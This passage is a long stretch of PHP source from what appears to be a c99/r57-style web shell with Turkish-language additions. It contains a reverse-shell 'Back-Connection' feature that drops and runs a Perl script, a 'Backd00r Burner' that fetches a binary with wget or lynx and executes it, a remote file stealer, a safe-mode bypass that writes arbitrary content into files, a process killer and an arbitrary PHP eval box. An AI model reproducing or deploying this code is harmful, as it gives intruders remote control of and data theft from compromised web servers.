  2361. }
  2362. }
  2363. if ($act == "ls")
  2364. {
  2365. if (count($ls_arr) > 0) {$list = $ls_arr;}
  2366. else
  2367. {
  2368. $list = array();
  2369. if ($h = @opendir($d))
  2370. {
  2371. while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
  2372. closedir($h);
  2373. }
  2374. else {}
  2375. }
  2376. if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
  2377. else
  2378. {
  2379. //Building array
  2380. $objects = array();
  2381. $vd = "f"; //Viewing mode
  2382. if ($vd == "f")
  2383. {
  2384. $objects["head"] = array();
  2385. $objects["folders"] = array();
  2386. $objects["links"] = array();
  2387. $objects["files"] = array();
  2388. foreach ($list as $v)
  2389. {
  2390. $o = basename($v);
  2391. $row = array();
  2392. if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
  2393. elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
  2394. elseif (is_dir($v))
  2395. {
  2396. if (is_link($v)) {$type = "LINK";}
  2397. else {$type = "DIR";}
  2398. $row[] = $v;
  2399. $row[] = $type;
  2400. }
  2401. elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
  2402. $row[] = filemtime($v);
  2403. if (!$win)
  2404. {
  2405. $ow = posix_getpwuid(fileowner($v));
  2406. $gr = posix_getgrgid(filegroup($v));
  2407. $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
  2408. }
  2409. $row[] = fileperms($v);
  2410. if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
  2411. elseif (is_link($v)) {$objects["links"][] = $row;}
  2412. elseif (is_dir($v)) {$objects["folders"][] = $row;}
  2413. elseif (is_file($v)) {$objects["files"][] = $row;}
  2414. $i++;
  2415. }
  2416. $row = array();
  2417. $row[] = "<b>Name</b>";
  2418. $row[] = "<b>Size</b>";
  2419. $row[] = "<b>Modify</b>";
  2420. if (!$win)
  2421. {$row[] = "<b>Owner/Group</b>";}
  2422. $row[] = "<b>Perms</b>";
  2423. $row[] = "<b>Action</b>";
  2424. $parsesort = parsesort($sort);
  2425. $sort = $parsesort[0].$parsesort[1];
  2426. $k = $parsesort[0];
  2427. if ($parsesort[1] != "a") {$parsesort[1] = "d";}
  2428. $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
  2429. $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
  2430. $row[$k] .= $y;
  2431. for($i=0;$i<count($row)-1;$i++)
  2432. {
  2433. if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
  2434. }
  2435. $v = $parsesort[0];
  2436. usort($objects["folders"], "tabsort");
  2437. usort($objects["links"], "tabsort");
  2438. usort($objects["files"], "tabsort");
  2439. if ($parsesort[1] == "d")
  2440. {
  2441. $objects["folders"] = array_reverse($objects["folders"]);
  2442. $objects["files"] = array_reverse($objects["files"]);
  2443. }
  2444. $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
  2445. $tab = array();
  2446. $tab["cols"] = array($row);
  2447. $tab["head"] = array();
  2448. $tab["folders"] = array();
  2449. $tab["links"] = array();
  2450. $tab["files"] = array();
  2451. $i = 0;
  2452. foreach ($objects as $a)
  2453. {
  2454. $v = $a[0];
  2455. $o = basename($v);
  2456. $dir = dirname($v);
  2457. if ($disp_fullpath) {$disppath = $v;}
  2458. else {$disppath = $o;}
  2459. $disppath = str2mini($disppath,60);
  2460. if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  2461. elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  2462. foreach ($regxp_highlight as $r)
  2463. {
  2464. if (ereg($r[0],$o))
  2465. {
  2466. if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
  2467. else
  2468. {
  2469. $r[1] = round($r[1]);
  2470. $isdir = is_dir($v);
  2471. if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
  2472. {
  2473. if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
  2474. $disppath = $r[2].$disppath.$r[3];
  2475. if ($r[4]) {break;}
  2476. }
  2477. }
  2478. }
  2479. }
  2480. $uo = urlencode($o);
  2481. $ud = urlencode($dir);
  2482. $uv = urlencode($v);
  2483. $row = array();
  2484. if ($o == ".")
  2485. {
  2486. $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  2487. $row[] = "LINK";
  2488. }
  2489. elseif ($o == "..")
  2490. {
  2491. $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
  2492. $row[] = "LINK";
  2493. }
  2494. elseif (is_dir($v))
  2495. {
  2496. if (is_link($v))
  2497. {
  2498. $disppath .= " => ".readlink($v);
  2499. $type = "LINK";
  2500. $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  2501. }
  2502. else
  2503. {
  2504. $type = "DIR";
  2505. $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
  2506. }
  2507. $row[] = $type;
  2508. }
  2509. elseif(is_file($v))
  2510. {
  2511. $ext = explode(".",$o);
  2512. $c = count($ext)-1;
  2513. $ext = $ext[$c];
  2514. $ext = strtolower($ext);
  2515. $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
  2516. $row[] = view_size($a[1]);
  2517. }
  2518. $row[] = date("d.m.Y H:i:s",$a[2]);
  2519. if (!$win) {$row[] = $a[3];}
  2520. $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
  2521. if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
  2522. else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
  2523. if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}
  2524. else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}
  2525. if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
  2526. elseif (is_link($v)) {$tab["links"][] = $row;}
  2527. elseif (is_dir($v)) {$tab["folders"][] = $row;}
  2528. elseif (is_file($v)) {$tab["files"][] = $row;}
  2529. $i++;
  2530. }
  2531. }
  2532. // Compiling table
  2533. $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  2534. echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
  2535. foreach($table as $row)
  2536. {
  2537. echo "<tr>\r\n";
  2538. foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
  2539. echo "</tr>\r\n";
  2540. }
  2541. echo "</table><hr size=\"1\" noshade><p align=\"right\">
  2542. <script>
  2543. function ls_setcheckboxall(status)
  2544. {
  2545. var id = 1;
  2546. var num = ".(count($table)-2).";
  2547. while (id <= num)
  2548. {
  2549. document.getElementById('actbox'+id).checked = status;
  2550. id++;
  2551. }
  2552. }
  2553. function ls_reverse_all()
  2554. {
  2555. var id = 1;
  2556. var num = ".(count($table)-2).";
  2557. while (id <= num)
  2558. {
  2559. document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
  2560. id++;
  2561. }
  2562. }
  2563. </script>
  2564. <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">
  2565. <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
  2566. if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  2567. {
  2568. echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  2569. }
  2570. echo "<select name=act><option value=\"".$act."\">With selected:</option>";
  2571. echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
  2572. echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
  2573. if ($usefsbuff)
  2574. {
  2575. echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
  2576. echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
  2577. echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
  2578. }
  2579. echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
  2580. echo "</form>";
  2581. }
  2582. }
  2583. if ($act == "tools")
  2584. {
  2585.  
  2586.  
  2587.  
  2588.  
  2589.  
  2590.  
  2591. ?>
  2592. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
  2593. <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57 </b></a> ::</b></p></td></tr>
  2594. <tr>
  2595. <td width="50%" height="83" valign="top"><center>
  2596. <div align="center">
  2597. </div>
  2598. <form action="<?php echo $surl; ?>">
  2599. <b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form>
  2600. </td>
  2601. <td width="50%" height="83" valign="top"><center>
  2602. <center>
  2603.  
  2604.  
  2605. <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form>
  2606. Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
  2607.  
  2608. </center>
  2609. </td>
  2610. </tr></TABLE>
  2611.  
  2612.  
  2613.  
  2614.  
  2615.  
  2616.  
  2617.  
  2618. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
  2619. <tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr>
  2620. <tr>
  2621. <td width="50%" height="83" valign="top"><center>
  2622. <div align="center"><b>Safe_Mode Bypass</b>
  2623. <form action="<?php echo $surl; ?>" method="POST">
  2624. <input type=hidden name=act value=tools>
  2625. <textarea name="erorr" cols=100 rows=10></textarea></br>
  2626. <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84>
  2627. <input type="submit" value="Write 2 File !!">
  2628.  
  2629. </form>
  2630.  
  2631.  
  2632.  
  2633.  
  2634.  
  2635.  
  2636.  
  2637.  
  2638.  
  2639.  
  2640.  
  2641. </div>
  2642.  
  2643. </td>
  2644. <td width="50%" height="83" valign="top"><center>
  2645. <center>
  2646. <form action="<?php echo $surl; ?>" method="POST">
  2647. <input type=hidden name=act value=tools>
  2648. Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500 value=""><br><br>
  2649. Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br>
  2650. <input type=submit class='stealthSubmit' Value='Dosyayi Chek'>
  2651. </form>
  2652. <br><br><br>
  2653.  
  2654.  
  2655.  
  2656.  
  2657. </center>
  2658.  
  2659. </center>
  2660. </td>
  2661. </tr></TABLE>
  2662.  
  2663.  
  2664.  
  2665.  
  2666.  
  2667.  
  2668.  
  2669.  
  2670.  
  2671.  
  2672.  
  2673.  
  2674. <?php
  2675.  
  2676. if (isset($_POST['dosyaa']))
  2677. {
  2678. dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
  2679.  
  2680. }
  2681. if (!empty($_GET['ipi']) && !empty($_GET['pipi']))
  2682. {
  2683. cf("/tmp/back",$back_connect);
  2684. $p2=which("perl");
  2685. $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &");
  2686. echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>";
  2687. }
  2688. if (!empty($_GET['dolma']))
  2689. {
  2690. $sayko=htmlspecialchars($_GET['dolma']);
  2691. if ($sayko == "wgetcan")
  2692. {
  2693.  
  2694. myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind");
  2695.  
  2696.  
  2697. }
  2698.  
  2699. else if ($sayko =="freadcan")
  2700. {
  2701. dosyayicek($adires,"sayko_bind");
  2702. myshellexec("./sayko_bind");
  2703. }
  2704.  
  2705. else if ($sayko == "lynxcan")
  2706. {
  2707. myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind");
  2708.  
  2709. }
  2710.  
  2711.  
  2712.  
  2713.  
  2714.  
  2715. }
  2716.  
  2717. if (!empty($_POST['erorr']))
  2718. {
  2719.  
  2720.  
  2721.  
  2722. error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
  2723.  
  2724.  
  2725.  
  2726. }
  2727.  
  2728.  
  2729.  
  2730.  
  2731.  
  2732.  
  2733.  
  2734.  
  2735.  
  2736. }
  2737. if ($act == "processes")
  2738. {
  2739. echo "<b>Processes:</b><br>";
  2740. if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
  2741. else {$handler = "tasklist";}
  2742. $ret = myshellexec($handler);
  2743. if (!$ret) {echo "Can't execute \"".$handler."\"!";}
  2744. else
  2745. {
  2746. if (empty($processes_sort)) {$processes_sort = $sort_default;}
  2747. $parsesort = parsesort($processes_sort);
  2748. if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  2749. $k = $parsesort[0];
  2750. if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2751. else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2752. $ret = htmlspecialchars($ret);
  2753. if (!$win)
  2754. {
  2755. if ($pid)
  2756. {
  2757. if (is_null($sig)) {$sig = 9;}
  2758. echo "Sending signal ".$sig." to #".$pid."... ";
  2759. if (posix_kill($pid,$sig)) {echo "OK.";}
  2760. else {echo "ERROR.";}
  2761. }
  2762. while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
  2763. $stack = explode("\n",$ret);
  2764. $head = explode(" ",$stack[0]);
  2765. unset($stack[0]);
  2766. for($i=0;$i<count($head);$i++)
  2767. {
  2768. if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
  2769. }
  2770. $prcs = array();
  2771. foreach ($stack as $line)
  2772. {
  2773. if (!empty($line))
  2774. {
  2775. echo "<tr>";
  2776. $line = explode(" ",$line);
  2777. $line[10] = join(" ",array_slice($line,10));
  2778. $line = array_slice($line,0,11);
  2779. if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
  2780. $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
  2781. $prcs[] = $line;
  2782. echo "</tr>";
  2783. }
  2784. }
  2785. }
  2786. else
  2787. {
  2788. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2789. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2790. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2791. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2792. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2793. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2794. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2795. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2796. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2797. while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
  2798. while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2799. $ret = convert_cyr_string($ret,"d","w");
  2800. $stack = explode("\n",$ret);
  2801. unset($stack[0],$stack[2]);
  2802. $stack = array_values($stack);
  2803. $head = explode("",$stack[0]);
  2804. $head[1] = explode(" ",$head[1]);
  2805. $head[1] = $head[1][0];
  2806. $stack = array_slice($stack,1);
  2807. unset($head[2]);
  2808. $head = array_values($head);
  2809. if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2810. else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
  2811. if ($k > count($head)) {$k = count($head)-1;}
  2812. for($i=0;$i<count($head);$i++)
  2813. {
  2814. if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
  2815. }
  2816. $prcs = array();
  2817. foreach ($stack as $line)
  2818. {
  2819. if (!empty($line))
  2820. {
  2821. echo "<tr>";
  2822. $line = explode("",$line);
  2823. $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  2824. $line[2] = intval(str_replace(" ","",$line[2]))*1024;
  2825. $prcs[] = $line;
  2826. echo "</tr>";
  2827. }
  2828. }
  2829. }
  2830. $head[$k] = "<b>".$head[$k]."</b>".$y;
  2831. $v = $processes_sort[0];
  2832. usort($prcs,"tabsort");
  2833. if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2834. $tab = array();
  2835. $tab[] = $head;
  2836. $tab = array_merge($tab,$prcs);
  2837. echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  2838. foreach($tab as $i=>$k)
  2839. {
  2840. echo "<tr>";
  2841. foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
  2842. echo "</tr>";
  2843. }
  2844. echo "</table>";
  2845. }
  2846. }
  2847. if ($act == "eval")
  2848. {
  2849. if (!empty($eval))
  2850. {
  2851. echo "<b>Result of execution this PHP-code</b>:<br>";
  2852. $tmp = ob_get_contents();
  2853. $olddir = realpath(".");
  2854. @chdir($d);
  2855. if ($tmp)
  2856. {
  2857. ob_clean();
  2858. eval($eval);
  2859. $ret = ob_get_contents();
  2860. $ret = convert_cyr_string($ret,"d","w");
  2861. ob_clean();
  2862. echo $tmp;
  2863. if ($eval_txt)
  2864. {
  2865. $rows = count(explode("\r\n",$ret))+1;
  2866. if ($rows < 10) {$rows = 10;}
  2867. echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  2868. }
  2869. else {echo $ret."<br>";}
  2870. }
  2871. else
  2872. {
  2873. if ($eval_txt)
  2874. {
  2875. echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  2876. eval($eval);
  2877. echo "</textarea>";
  2878. }
  2879. else {echo $ret;}
  2880. }
  2881. @chdir($olddir);
  2882. }
  2883. else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
  2884. echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
  2885. }
  2886. if ($act == "f")
  2887. {
  2888. if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
  2889. {
  2890. if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  2891. else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
  2892. }
  2893. else
  2894. {
  2895. $r = @file_get_contents($d.$f);
  2896. $ext = explode(".",$f);
  2897. $c = count($ext)-1;
  2898. $ext = $ext[$c];
  2899. $ext = strtolower($ext);
  2900. $rft = "";
  2901. foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  2902. if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  2903. if (empty($ft)) {$ft = $rft;}
  2904. $arr = array(
  2905. array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
  2906. array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
  2907. array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
  2908. array("Code","code"),
  2909. array("Session","phpsess"),
  2910. array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
  2911. array("SDB","sdb"),
  2912. array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
  2913. array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
  2914. array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
  2915. array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
  2916. array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
  2917. );
  2918. echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  2919. foreach($arr as $t)
  2920. {
  2921. if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
  2922. elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
  2923. else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
  2924. echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
  2925. }
  2926. echo "<hr size=\"1\" noshade>";
  2927. if ($ft == "info")
  2928. {
  2929. echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
  2930. if (!$win)
  2931. {
  2932. echo "<tr><td><b>Owner/Group</b></td><td> ";
  2933. $ow = posix_getpwuid(fileowner($d.$f));
  2934. $gr = posix_getgrgid(filegroup($d.$f));
  2935. echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
  2936. }
  2937. echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
  2938. $fi = fopen($d.$f,"rb");
  2939. if ($fi)
  2940. {
  2941. if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
  2942. else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
  2943. $n = 0;
  2944. $a0 = "00000000<br>";
  2945. $a1 = "";
  2946. $a2 = "";
  2947. for ($i=0; $i<strlen($str); $i++)
  2948. {
  2949. $a1 .= sprintf("%02X",ord($str[$i]))." ";
  2950. switch (ord($str[$i]))
  2951. {
  2952. case 0: $a2 .= "<font>0</font>"; break;
  2953. case 32:
  2954. case 10:
  2955. case 13: $a2 .= "&nbsp;"; break;
  2956. default: $a2 .= htmlspecialchars($str[$i]);
  2957. }
  2958. $n++;
  2959. if ($n == $hexdump_rows)
  2960. {
  2961. $n = 0;
  2962. if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
  2963. $a1 .= "<br>";
  2964. $a2 .= "<br>";
  2965. }
  2966. }
  2967. //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
  2968. echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
  2969. }
  2970. $encoded = "";
  2971. if ($base64 == 1)
  2972. {
  2973. echo "<b>Base64 Encode</b><br>";
  2974. $encoded = base64_encode(file_get_contents($d.$f));
  2975. }
  2976. elseif($base64 == 2)
  2977. {
  2978. echo "<b>Base64 Encode + Chunk</b><br>";
  2979. $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
  2980. }
  2981. elseif($base64 == 3)
  2982. {
  2983. echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
  2984. $encoded = base64_encode(file_get_contents($d.$f));
  2985. $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  2986. }
  2987. elseif($base64 == 4)
  2988. {
  2989. $text = file_get_contents($d.$f);
  2990. $encoded = base64_decode($text);
  2991. echo "<b>Base64 Decode";
  2992. if (base64_encode($encoded) != $text) {echo " (failed)";}
  2993. echo "</b><br>";
  2994. }
  2995. if (!empty($encoded))
  2996. {
  2997. echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  2998. }
